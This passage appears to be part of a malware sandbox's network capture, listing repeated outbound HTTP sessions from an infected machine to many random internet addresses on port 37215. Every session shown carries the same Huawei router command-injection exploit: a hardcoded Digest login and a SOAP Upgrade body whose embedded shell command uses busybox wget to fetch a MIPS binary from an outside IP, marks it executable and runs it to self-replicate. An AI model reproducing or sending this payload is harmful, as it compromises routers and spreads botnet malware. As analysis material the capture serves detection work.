                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2101192.168.2.135798643.116.194.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.581712961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2102192.168.2.1347840197.168.156.25337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.581794977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2103192.168.2.1337502157.6.176.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.581798077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2104192.168.2.136017024.113.199.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.581811905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2105192.168.2.1334110197.134.250.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.581825018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2106192.168.2.1344646197.206.229.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.581837893 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2107192.168.2.1344464197.122.20.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.581978083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2108192.168.2.1335114197.17.42.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.581984043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2109192.168.2.1348286220.25.107.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.582011938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2110192.168.2.1335188197.207.69.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.582014084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 